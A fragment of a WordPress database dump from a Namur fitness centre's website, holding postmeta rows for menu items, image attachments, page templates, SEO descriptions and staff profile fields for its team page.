(56, 24, '_menu_item_menu_item_parent', '0'),
(57, 24, '_menu_item_object_id', '22'),
(58, 24, '_menu_item_object', 'page'),
(59, 24, '_menu_item_target', ''),
(60, 24, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(61, 24, '_menu_item_xfn', ''),
(62, 24, '_menu_item_url', ''),
(64, 25, '_menu_item_type', 'post_type'),
(65, 25, '_menu_item_menu_item_parent', '0'),
(66, 25, '_menu_item_object_id', '20'),
(67, 25, '_menu_item_object', 'page'),
(68, 25, '_menu_item_target', ''),
(69, 25, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(70, 25, '_menu_item_xfn', ''),
(71, 25, '_menu_item_url', ''),
(86, 68, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:200;s:6:\"height\";i:200;s:4:\"file\";s:16:\"2013/06/trx1.jpg\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:16:\"trx1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:10:{s:8:\"aperture\";i:0;s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:0;s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";i:0;s:3:\"iso\";i:0;s:13:\"shutter_speed\";i:0;s:5:\"title\";s:0:\"\";}}'),
(85, 68, '_wp_attached_file', '2013/06/trx1.jpg'),
(87, 70, '_wp_attached_file', '2013/06/kb.jpg'),
(88, 70, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:200;s:6:\"height\";i:200;s:4:\"file\";s:14:\"2013/06/kb.jpg\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:14:\"kb-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:10:{s:8:\"aperture\";i:0;s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:0;s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";i:0;s:3:\"iso\";i:0;s:13:\"shutter_speed\";i:0;s:5:\"title\";s:0:\"\";}}'),
(89, 72, '_wp_attached_file', '2013/06/vipr-f1.jpg'),
(90, 72, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:200;s:6:\"height\";i:200;s:4:\"file\";s:19:\"2013/06/vipr-f1.jpg\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"vipr-f1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:10:{s:8:\"aperture\";i:0;s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:0;s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";i:0;s:3:\"iso\";i:0;s:13:\"shutter_speed\";i:0;s:5:\"title\";s:0:\"\";}}'),
(91, 75, '_wp_attached_file', '2013/06/ript.jpg'),
(92, 75, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:200;s:6:\"height\";i:200;s:4:\"file\";s:16:\"2013/06/ript.jpg\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:16:\"ript-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:10:{s:8:\"aperture\";i:0;s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:0;s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";i:0;s:3:\"iso\";i:0;s:13:\"shutter_speed\";i:0;s:5:\"title\";s:0:\"\";}}'),
(106, 102, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1116;s:6:\"height\";i:287;s:4:\"file\";s:17:\"2013/06/pico1.png\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"pico1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:16:\"pico1-300x77.png\";s:5:\"width\";i:300;s:6:\"height\";i:77;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:18:\"pico1-1024x263.png\";s:5:\"width\";i:1024;s:6:\"height\";i:263;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post_thumbnail\";a:4:{s:4:\"file\";s:17:\"pico1-595x224.png\";s:5:\"width\";i:595;s:6:\"height\";i:224;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:10:{s:8:\"aperture\";i:0;s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:0;s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";i:0;s:3:\"iso\";i:0;s:13:\"shutter_speed\";i:0;s:5:\"title\";s:0:\"\";}}'),
(107, 103, '_wp_attached_file', '2013/06/picto2.png'),
(108, 103, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1045;s:6:\"height\";i:1077;s:4:\"file\";s:18:\"2013/06/picto2.png\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"picto2-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:18:\"picto2-291x300.png\";s:5:\"width\";i:291;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:19:\"picto2-993x1024.png\";s:5:\"width\";i:993;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post_thumbnail\";a:4:{s:4:\"file\";s:18:\"picto2-595x224.png\";s:5:\"width\";i:595;s:6:\"height\";i:224;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:10:{s:8:\"aperture\";i:0;s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:0;s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";i:0;s:3:\"iso\";i:0;s:13:\"shutter_speed\";i:0;s:5:\"title\";s:0:\"\";}}'),
(105, 102, '_wp_attached_file', '2013/06/pico1.png'),
(109, 130, '_wp_attached_file', '2013/06/rg.jpg'),
(110, 130, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:132;s:6:\"height\";i:195;s:4:\"file\";s:14:\"2013/06/rg.jpg\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:14:\"rg-132x150.jpg\";s:5:\"width\";i:132;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:10:{s:8:\"aperture\";i:0;s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:0;s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";i:0;s:3:\"iso\";i:0;s:13:\"shutter_speed\";i:0;s:5:\"title\";s:0:\"\";}}'),
(111, 148, '_edit_last', '1'),
(1551, 392, '_su_description', 's:177:\"a:1:{i:0;s:158:\"Unique à Namur, une nouvelle façon de faire du fitness. Julie Pierrard, Damien Pierrard, Guélor Luabeya, Matthieu Gille, Bertrand Bauwin, Julien Meulemans.\";}\";'),
(1030, 331, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1031, 331, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1374769981:1\";}\";'),
(1032, 331, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1033, 11, '_su_title', 'Cross Training Center - Les séances'),
(1054, 334, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1034, 11, '_su_description', 'Unique à Namur, une nouvelle façon de faire du fitness - prix des séances de : Coaching nutritionnel, Personal Training, Duo Training, Team Training'),
(1035, 11, '_su_rich_snippet_type', 'none'),
(218, 148, 'nom', 'Pierrard'),
(219, 148, 'prenom', 'Julie'),
(220, 148, 'mail', 'julie@crosstrainingcenter.be'),
(221, 148, 'actif_trombi', 'oui'),
(222, 148, 'fonction', 'Gérante, Diététicienne et coach'),
(223, 148, 'telephone_fixe', ''),
(224, 148, 'telephone_portable', ''),
(225, 148, 'commentaires', 'Baccalauréat en diététique\r\nSpécialisation en diététique du sport\r\nEnseignante en éducation nutritionnelle\r\nPratiquante de judo, natation et cyclisme'),
(226, 148, 'actif_trombi_1', ''),
(141, 148, '_edit_lock', '1372860691:1'),
(142, 150, '_edit_last', '1'),
(1026, 22, '_su_rich_snippet_type', 'none'),
(1018, 328, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1019, 328, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1373526228:1\";}\";'),
(1020, 328, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1021, 330, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1022, 330, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1374769809:1\";}\";'),
(1023, 330, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1024, 22, '_su_title', 'Cross Training Center - Le cross training'),
(1025, 22, '_su_description', 'Unique à Namur, une nouvelle façon de faire du fitness. Le cross training regroupe les disciplines : TRX Suspension Training, Kettlebell, ViPR, RIP Trainer.'),
(1060, 335, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(191, 150, 'nom', 'Gille'),
(192, 150, 'prenom', 'Mathieu'),
(193, 150, 'mail', ''),
(194, 150, 'actif_trombi', 'oui'),
(195, 150, 'fonction', 'Coatch'),
(196, 150, 'telephone_fixe', ''),
(197, 150, 'telephone_portable', ''),
(198, 150, 'commentaires', 'Préparateur physique en sport collectif et individuel\r\nBrevet A de l’URBSFA\r\nPratiquant de foot, triathlon, tennis et golf'),
(199, 150, 'actif_trombi_1', ''),
(172, 150, '_edit_lock', '1372861677:1'),
(1550, 392, '_su_title', 's:51:\"a:1:{i:0;s:33:\"Cross Training Center - L\'équipe\";}\";'),
(1549, 392, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(230, 154, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(231, 154, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372866031:1\";}\";'),
(232, 154, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1548, 392, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383772046:1\";}\";'),
(1547, 392, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1546, 131, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1545, 131, '_su_description', 's:177:\"a:1:{i:0;s:158:\"Unique à Namur, une nouvelle façon de faire du fitness. Julie Pierrard, Damien Pierrard, Guélor Luabeya, Matthieu Gille, Bertrand Bauwin, Julien Meulemans.\";}\";'),
(1544, 131, '_su_title', 's:51:\"a:1:{i:0;s:33:\"Cross Training Center - L\'équipe\";}\";'),
(1543, 131, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1542, 131, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383772031:1\";}\";'),
(1541, 131, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1540, 391, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(251, 155, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(252, 155, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372866736:1\";}\";'),
(253, 155, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(254, 156, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(255, 156, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372866772:1\";}\";'),
(256, 156, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(257, 157, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(258, 157, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372866815:1\";}\";'),
(259, 157, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(260, 158, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(261, 158, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372866881:1\";}\";'),
(262, 158, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1539, 391, '_su_description', 's:177:\"a:1:{i:0;s:158:\"Unique à Namur, une nouvelle façon de faire du fitness. Julie Pierrard, Damien Pierrard, Guélor Luabeya, Matthieu Gille, Bertrand Bauwin, Julien Meulemans.\";}\";'),
(266, 159, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(267, 159, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372867702:1\";}\";'),
(268, 159, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(269, 160, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(270, 160, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372867707:1\";}\";'),
(271, 160, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1538, 391, '_su_title', 's:51:\"a:1:{i:0;s:33:\"Cross Training Center - L\'équipe\";}\";'),
(1537, 391, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(275, 161, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(276, 161, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372868240:1\";}\";'),
(277, 161, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1536, 391, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383771971:1\";}\";'),
(1535, 391, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1534, 131, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1533, 131, '_su_description', 's:177:\"a:1:{i:0;s:158:\"Unique à Namur, une nouvelle façon de faire du fitness. Julie Pierrard, Damien Pierrard, Guélor Luabeya, Matthieu Gille, Bertrand Bauwin, Julien Meulemans.\";}\";'),
(1532, 131, '_su_title', 's:51:\"a:1:{i:0;s:33:\"Cross Training Center - L\'équipe\";}\";'),
(287, 162, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(288, 162, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372868811:1\";}\";'),
(289, 162, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(290, 163, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(291, 163, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372868821:1\";}\";'),
(292, 163, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(293, 164, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(294, 164, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372868861:1\";}\";'),
(295, 164, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(296, 165, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(297, 165, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372868903:1\";}\";'),
(298, 165, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1531, 131, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1530, 131, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383771956:1\";}\";'),
(1529, 131, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(302, 166, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(303, 166, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372869018:1\";}\";'),
(304, 166, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(305, 167, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(306, 167, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372869154:1\";}\";'),
(307, 167, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(308, 168, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(309, 168, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372869159:1\";}\";'),
(310, 168, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(311, 169, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(312, 169, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372869186:1\";}\";'),
(313, 169, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(314, 170, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(315, 170, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372869226:1\";}\";'),
(316, 170, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(317, 171, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(318, 171, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372869284:1\";}\";'),
(319, 171, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(320, 172, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(321, 172, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372869702:1\";}\";'),
(322, 172, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(326, 173, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(327, 173, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372869819:1\";}\";'),
(328, 173, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(329, 174, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(330, 174, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372870126:1\";}\";'),
(331, 174, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(332, 175, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(333, 175, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372870146:1\";}\";'),
(334, 175, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(338, 176, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(339, 176, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372870404:1\";}\";'),
(340, 176, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(347, 177, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(348, 177, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372870855:1\";}\";'),
(349, 177, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(350, 178, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(351, 178, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372870868:1\";}\";'),
(352, 178, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(353, 179, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(354, 179, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372870920:1\";}\";'),
(355, 179, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(356, 180, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(357, 180, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372870942:1\";}\";'),
(358, 180, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1528, 390, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:198;s:6:\"height\";i:259;s:4:\"file\";s:28:\"2013/05/chloe_chmiel_pti.jpg\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"chloe_chmiel_pti-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post_thumbnail\";a:4:{s:4:\"file\";s:28:\"chloe_chmiel_pti-198x224.jpg\";s:5:\"width\";i:198;s:6:\"height\";i:224;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:10:{s:8:\"aperture\";d:2.79999999999999982236431605997495353221893310546875;s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:17:\"Canon IXUS 115 HS\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:1383595205;s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"5\";s:3:\"iso\";s:3:\"250\";s:13:\"shutter_speed\";s:17:\"0.016666666666667\";s:5:\"title\";s:0:\"\";}}'),
(1527, 390, '_wp_attached_file', '2013/05/chloe_chmiel_pti.jpg'),
(362, 181, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(363, 181, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372871113:1\";}\";'),
(364, 181, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(365, 182, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(366, 182, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372871840:1\";}\";'),
(367, 182, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1526, 131, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(371, 183, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(372, 183, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372872257:1\";}\";'),
(373, 183, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1525, 131, '_su_description', 's:177:\"a:1:{i:0;s:158:\"Unique à Namur, une nouvelle façon de faire du fitness. Julie Pierrard, Damien Pierrard, Guélor Luabeya, Matthieu Gille, Bertrand Bauwin, Julien Meulemans.\";}\";'),
(377, 184, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(378, 184, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372872467:1\";}\";'),
(379, 184, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1524, 131, '_su_title', 's:51:\"a:1:{i:0;s:33:\"Cross Training Center - L\'équipe\";}\";'),
(1523, 131, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(383, 185, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(384, 185, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372872582:1\";}\";'),
(385, 185, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1522, 131, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383771896:1\";}\";'),
(1521, 131, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(389, 186, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(390, 186, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372872809:1\";}\";'),
(391, 186, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1520, 131, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(395, 187, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(396, 187, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372872880:1\";}\";'),
(397, 187, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1519, 131, '_su_description', 's:177:\"a:1:{i:0;s:158:\"Unique à Namur, une nouvelle façon de faire du fitness. Julie Pierrard, Damien Pierrard, Guélor Luabeya, Matthieu Gille, Bertrand Bauwin, Julien Meulemans.\";}\";'),
(1518, 131, '_su_title', 's:51:\"a:1:{i:0;s:33:\"Cross Training Center - L\'équipe\";}\";'),
(1517, 131, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(404, 188, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(405, 188, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372873027:1\";}\";'),
(406, 188, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(407, 189, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(408, 189, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372873080:1\";}\";'),
(409, 189, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(410, 190, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(411, 190, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372873122:1\";}\";'),
(412, 190, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(413, 191, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(414, 191, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372873176:1\";}\";'),
(415, 191, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(416, 192, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(417, 192, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372873192:1\";}\";'),
(418, 192, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(419, 193, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(420, 193, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372873207:1\";}\";'),
(421, 193, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(422, 194, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(423, 194, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372873226:1\";}\";'),
(424, 194, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(425, 195, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(426, 195, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372873245:1\";}\";'),
(427, 195, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(428, 196, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(429, 196, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372873258:1\";}\";'),
(430, 196, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(431, 197, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(432, 197, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372873275:1\";}\";'),
(433, 197, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1516, 131, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383771796:1\";}\";'),
(1515, 131, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1514, 131, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(440, 198, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(441, 198, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372873711:1\";}\";'),
(442, 198, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1513, 131, '_su_description', 's:177:\"a:1:{i:0;s:158:\"Unique à Namur, une nouvelle façon de faire du fitness. Julie Pierrard, Damien Pierrard, Guélor Luabeya, Matthieu Gille, Bertrand Bauwin, Julien Meulemans.\";}\";'),
(446, 199, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(447, 199, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372873831:1\";}\";'),
(448, 199, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(449, 200, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(450, 200, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372873878:1\";}\";'),
(451, 200, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1512, 131, '_su_title', 's:51:\"a:1:{i:0;s:33:\"Cross Training Center - L\'équipe\";}\";'),
(1511, 131, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(455, 201, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
